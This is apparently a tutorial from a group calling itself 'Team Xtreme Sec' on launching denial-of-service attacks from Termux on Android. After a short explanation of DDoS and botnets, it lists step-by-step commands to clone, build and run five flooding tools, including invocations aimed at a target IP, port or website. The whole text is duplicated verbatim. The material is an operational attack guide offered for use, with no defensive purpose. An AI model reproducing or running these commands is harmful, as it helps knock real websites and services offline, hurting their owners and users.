How to do a DDOS attack via Termux?
What is DDoS?
By carrying out a "* denial of service * attack" (DDoS), the attackers aim to flood servers or computer systems with a large number of requests until they make their services and sites unavailable. Internet or other Internet services are no longer accessible.
Such DDoS attacks are often based on personal, political or economic interests on the part of the attackers. This is the reason why DDoS attacks are generally not directed against vendors, but rather at websites hosted by the vendor and which must be undermined through the attack.
How do attackers carry out DDoS attacks?
For such a DDoS attack, criminals use specific malware that infects hundreds of unprotected computers and thus gain control over them. Several infected computers then form a botnet that Internet criminals use to attack servers en masse. To boycott an Intrernet site, computers send data packets to the Web server in question until the latter no longer has the capacity to process the data and must therefore interrupt its service.
1. * Hammer *
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ python hammer.py
$ python hammer.py -s [IP address] -p [port] -t 135
2. * Xerxes *
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes www.site.com 80
3. * Torshammer *
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ python2 torshammer.py
4. * liteDDOS *
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py
5. * Ddos attack by dost *
$ git clone https://github.com/verluchie/dost-attack
$ cd dost-attack
$ chmod 777 dost
$ ./install.sh
$ dost
Team Xtreme Sec
What is DDoS?
By carrying out a "* denial of service * attack" (DDoS), the attackers aim to flood servers or computer systems with a large number of requests until they make their services and sites unavailable. Internet or other Internet services are no longer accessible.
Such DDoS attacks are often based on personal, political or economic interests on the part of the attackers. This is the reason why DDoS attacks are generally not directed against vendors, but rather at websites hosted by the vendor and which must be undermined through the attack.
How do attackers carry out DDoS attacks?
For such a DDoS attack, criminals use specific malware that infects hundreds of unprotected computers and thus gain control over them. Several infected computers then form a botnet that Internet criminals use to attack servers en masse. To boycott an Intrernet site, computers send data packets to the Web server in question until the latter no longer has the capacity to process the data and must therefore interrupt its service.
1. * Hammer *
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ python hammer.py
$ python hammer.py -s [IP address] -p [port] -t 135
2. * Xerxes *
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes www.site.com 80
3. * Torshammer *
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ python2 torshammer.py
4. * liteDDOS *
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py
5. * Ddos attack by dost *
$ git clone https://github.com/verluchie/dost-attack
$ cd dost-attack
$ chmod 777 dost
$ ./install.sh
$ dost
Team Xtreme Sec